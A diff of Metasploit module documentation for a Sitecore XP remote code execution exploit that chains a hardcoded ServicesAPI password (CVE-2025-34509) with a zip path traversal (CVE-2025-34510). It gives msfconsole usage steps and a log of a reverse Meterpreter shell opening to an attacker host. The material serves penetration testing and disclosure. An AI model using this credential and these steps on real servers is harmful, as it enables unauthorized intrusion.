|
1 | | -The following is the recommended format for module documentation. But feel free to add more content/sections to this. |
2 | | -One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop |
3 | | -functioning in 5+ years, so giving links or specific examples can be VERY helpful. |
4 | | - |
5 | 1 | ## Vulnerable Application |
6 | 2 |
|
7 | | -Instructions to get the vulnerable application. If applicable, include links to the vulnerable install |
8 | | -files, as well as instructions on installing/configuring the environment if it is different than a |
9 | | -standard install. Much of this will come from the PR, and can be copy/pasted. |
| 3 | +The Sitecore Experience Platform (XP) is flagship CMS product. Provides comprehensive digital marketing tools, view of customer data and many other features. Sitecore deploys multiple default service accounts when installing, among them ServicesAPI. The versions from 10 to 10.4 have hardcoded password for this account - the password is letter b (CVE-2025-34509). This account is used to gain access and exploit additional vulnerability - path traversal in zip extraction (CVE-2025-34510). This module exploits both vulnerabilities to gain remote code execution by uploading malicious ASPX into root directory of webserver. |
| 4 | + |
| 5 | +### Installation |
| 6 | + |
| 7 | +The Sitecore XP can be downloaded from [here](https://developers.sitecore.com/downloads/Sitecore_Experience_Platform). Please note that a license is required for successful installation. |
| 8 | + |
10 | 9 |
|
11 | 10 | ## Verification Steps |
12 | | -Example steps in this format (is also in the PR): |
13 | 11 |
|
14 | 12 | 1. Install the application |
15 | 13 | 1. Start msfconsole |
16 | | -1. Do: `use [module path]` |
| 14 | +1. Do: `use exploit/windows/http/sitecore_xp_cve_2025_34510` |
| 15 | +1. Do: `set RHOSTS [Sitecore XP IP address]` |
| 16 | +1. Do: `set VHOST [Sitecore XP hostname]` |
| 17 | +1. Do: `set IDENTITY_VHOST [hostname of Sitecore XP identity server]` |
| 18 | +1. Do: `set LHOST [attacker IP]` |
17 | 19 | 1. Do: `run` |
18 | | -1. You should get a shell. |
19 | 20 |
|
20 | 21 | ## Options |
21 | | -List each option and how to use it. |
22 | 22 |
|
23 | | -### Option Name |
24 | 23 |
|
25 | | -Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here. |
| 24 | +### VHOST |
26 | 25 |
|
27 | | -## Scenarios |
28 | | -Specific demo of using the module that might be useful in a real world scenario. |
| 26 | +The hostname of Sitecore XP - when installed, Sitecore XP deploys multiple vhosts, among them is the Sitecore XP host, where a user can access majority of functions. |
29 | 27 |
|
30 | | -### Version and OS |
31 | 28 |
|
32 | | -``` |
33 | | -code or console output |
34 | | -``` |
| 29 | +### IDENTITY_VHOST |
35 | 30 |
|
36 | | -For example: |
| 31 | +The Sitecore XP uses separate vhost for "identity host", which is used when user is authenticating and asking for session data. |
37 | 32 |
|
38 | | -To do this specific thing, here's how you do it: |
| 33 | +## Scenarios |
39 | 34 |
|
40 | 35 | ``` |
41 | | -msf > use module_name |
42 | | -msf auxiliary(module_name) > set POWERLEVEL >9000 |
43 | | -msf auxiliary(module_name) > exploit |
| 36 | +msf exploit(windows/http/sitecore_xp_cve_2025_34510) > run verbose=true |
| 37 | +[*] Started reverse TCP handler on 192.168.3.7:4444 |
| 38 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 39 | +[+] The target is vulnerable. Sitecore version detected 10.3.0, which is vulnerable |
| 40 | +[*] Sending stage (203846 bytes) to 10.5.132.138 |
| 41 | +[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.132.138:50530) at 2025-08-26 13:05:53 +0200 |
| 42 | +
|
| 43 | +meterpreter > sysinfo |
| 44 | +Computer : WIN11_22H2_0800 |
| 45 | +OS : Windows 11 22H2 (10.0 Build 22621). |
| 46 | +Architecture : x64 |
| 47 | +System Language : en_US |
| 48 | +Domain : WORKGROUP |
| 49 | +Logged On Users : 2 |
| 50 | +Meterpreter : x64/windows |
| 51 | +meterpreter > getuid |
| 52 | +Server username: IIS APPPOOL\sitecorepocsc.dev.local |
44 | 53 | ``` |
0 commit comments